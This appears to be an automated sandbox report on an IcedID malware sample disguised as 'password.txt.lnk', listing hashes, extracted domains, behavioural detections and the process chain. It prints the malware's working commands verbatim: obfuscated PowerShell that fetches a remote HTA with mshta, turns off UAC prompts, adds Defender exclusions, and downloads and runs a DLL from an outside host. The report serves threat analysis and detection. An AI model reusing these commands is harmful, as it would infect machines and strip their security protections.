Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
23-06-2022 16:05
Static task
static1
Behavioral task
behavioral1
Sample
password.txt.lnk
Resource
win7-20220414-en
General
-
Target
password.txt.lnk
-
Size
1KB
-
MD5
ee5dc8a66298685a6f6790e32e1a006b
-
SHA1
8bd4a8e15b8c097283b67dd8201ed41e01cbe794
-
SHA256
65e7327a6f3efb230a4d61966182f1d1c592aa222f4f820afaca6617680d09bd
-
SHA512
8c0164d4576959d7d474cd39545db1564e459f0ab55e51df601d132d6667b41e8751d236a3850934b0575ae9c1e09e230019609669276d36849da40400f0613c
Malware Config
Extracted
https://wang-data-science.com/wp-content/themes/scapeshot/etest.hta
Extracted
icedid
3289900935
ilzenhwery.com
Signatures
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
Blocklisted process makes network request 6 IoCs
Processes:
mshta.exepowershell.exerundll32.exeflow pid process 6 2688 mshta.exe 7 2688 mshta.exe 9 2688 mshta.exe 11 2688 mshta.exe 12 328 powershell.exe 15 2184 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exemshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation mshta.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 2184 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exerundll32.exepid process 1164 powershell.exe 1164 powershell.exe 328 powershell.exe 328 powershell.exe 2184 rundll32.exe 2184 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1164 powershell.exe Token: SeDebugPrivilege 328 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exemshta.exepowershell.exedescription pid process target process PID 2300 wrote to memory of 1164 2300 cmd.exe powershell.exe PID 2300 wrote to memory of 1164 2300 cmd.exe powershell.exe PID 1164 wrote to memory of 2688 1164 powershell.exe mshta.exe PID 1164 wrote to memory of 2688 1164 powershell.exe mshta.exe PID 2688 wrote to memory of 328 2688 mshta.exe powershell.exe PID 2688 wrote to memory of 328 2688 mshta.exe powershell.exe PID 328 wrote to memory of 2184 328 powershell.exe rundll32.exe PID 328 wrote to memory of 2184 328 powershell.exe rundll32.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\password.txt.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $xrrCQEUf = [convert]::FromBase64String('PjIv');$rvIxkgme = [convert]::FromBase64String('GgQfAxZXHwMDBwRNWFgAFhkQWhMWAxZaBBQeEhkUElkUGBpYAAdaFBgZAxIZA1gDHxIaEgRYBBQWBxIEHxgDWBIDEgQDWR8DFg==');$BJtiaLic = -join($xrrCQEUf | % {[char] ($_ -bxor 0x77)});$uVgPreUS = -join ($rvIxkgme | % { [char] ($_ -bxor 0x77)});sal ABJmyxbD $BJtiaLic;ABJmyxbD $uVgPreUS2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://wang-data-science.com/wp-content/themes/scapeshot/etest.hta3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function BpCExIjDrdGi($nnVDyzh, $cfMRXTCG){[IO.File]::WriteAllBytes($nnVDyzh, $cfMRXTCG)};function BgqJOAPBzie($nnVDyzh){if($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66896,66904,66904))) -eq $True){rundll32.exe $nnVDyzh ,RunObject }elseif($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66908,66911,66845))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $nnVDyzh}else{Start-Process $nnVDyzh}};function YDwYoXfkvCiX($BUsiXmWVUTyBGlhNN){$uTDDSkKDrMcCukgsB = New-Object (fibYakKGHnxcX @(66874,66897,66912,66842,66883,66897,66894,66863,66904,66901,66897,66906,66912));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cfMRXTCG = $uTDDSkKDrMcCukgsB.DownloadData($BUsiXmWVUTyBGlhNN);return $cfMRXTCG};function fibYakKGHnxcX($ZPSYkAbHDFF){$vRDpSXA=66796;$ifTikh=$Null;foreach($efauSZiRIFLSvo in $ZPSYkAbHDFF){$ifTikh+=[char]($efauSZiRIFLSvo-$vRDpSXA)};return $ifTikh};function KTcwOeFIaImkX(){$kyNirfktEagoeXnmMr = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$nGDxbpOvNNZvVHtpfa=$env:AppData; Add-MpPreference -ExclusionPath $nGDxbpOvNNZvVHtpfa;Add-MpPreference -ExclusionExtension ?lnk?;$PkAZgfWOTxnZ = $kyNirfktEagoeXnmMr + 'test.dll'; if (Test-Path -Path $PkAZgfWOTxnZ){BgqJOAPBzie $PkAZgfWOTxnZ;}Else{ $SpgGVjW = YDwYoXfkvCiX (fibYakKGHnxcX @(66900,66912,66912,66908,66911,66854,66843,66843,66915,66893,66906,66899,66841,66896,66893,66912,66893,66841,66911,66895,66901,66897,66906,66895,66897,66842,66895,66907,66905,66843,66915,66908,66841,66895,66907,66906,66912,66897,66906,66912,66843,66912,66900,66897,66905,66897,66911,66843,66911,66895,66893,66908,66897,66911,66900,66907,66912,66843,66912,66897,66911,66912,66842,66896,66904,66904));BpCExIjDrdGi $PkAZgfWOTxnZ $SpgGVjW;BgqJOAPBzie $PkAZgfWOTxnZ;};;;;}KTcwOeFIaImkX;" uac4⤵
- UAC bypass
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\test.dll RunObject5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5e1fb26de120faadab3c093b78644964f
SHA1bb587dd3b1ad8384b6d612bc4bb806f41562982f
SHA256e1ce351162cae7e8671f980192da54b8440d309985687d8eef56fec0b3180a85
SHA5126e4d18e9506e72f90aea0c93d190b9817566bbbfa2409c1ae6ca98c2b81f8a2bd4204270ce951444d49dfc85c9f1b913952afe6b8fceea918dd97006cf322518
-
C:\Users\Admin\AppData\Roaming\test.dllFilesize
858KB
MD5f0b052dad1a3605cd3e6d044cd315388
SHA1fe3d8f50b494f400bd47842d580343f38be6a04b
SHA2564798655c9e1df924b92d224c53dce0e3e9028318a5fa6ee4e6bd9f0f32154cdd
SHA512c8ee79ae9739c1486f0a89039b69afa6057d34bf39d2be58187d265662066c052776627fa58aa519e98c072704437fc3eaa190923e351414ef9a149509ff716b
-
C:\Users\Admin\AppData\Roaming\test.dllFilesize
858KB
MD5f0b052dad1a3605cd3e6d044cd315388
SHA1fe3d8f50b494f400bd47842d580343f38be6a04b
SHA2564798655c9e1df924b92d224c53dce0e3e9028318a5fa6ee4e6bd9f0f32154cdd
SHA512c8ee79ae9739c1486f0a89039b69afa6057d34bf39d2be58187d265662066c052776627fa58aa519e98c072704437fc3eaa190923e351414ef9a149509ff716b
-
memory/328-135-0x0000000000000000-mapping.dmp
-
memory/328-138-0x00007FF83E5B0000-0x00007FF83F071000-memory.dmpFilesize
10.8MB
-
memory/328-142-0x00007FF83E5B0000-0x00007FF83F071000-memory.dmpFilesize
10.8MB
-
memory/1164-134-0x00007FF83F280000-0x00007FF83FD41000-memory.dmpFilesize
10.8MB
-
memory/1164-131-0x00000251D9940000-0x00000251D9962000-memory.dmpFilesize
136KB
-
memory/1164-130-0x0000000000000000-mapping.dmp
-
memory/2184-139-0x0000000000000000-mapping.dmp
-
memory/2184-143-0x0000000180000000-0x0000000180009000-memory.dmpFilesize
36KB
-
memory/2688-132-0x0000000000000000-mapping.dmp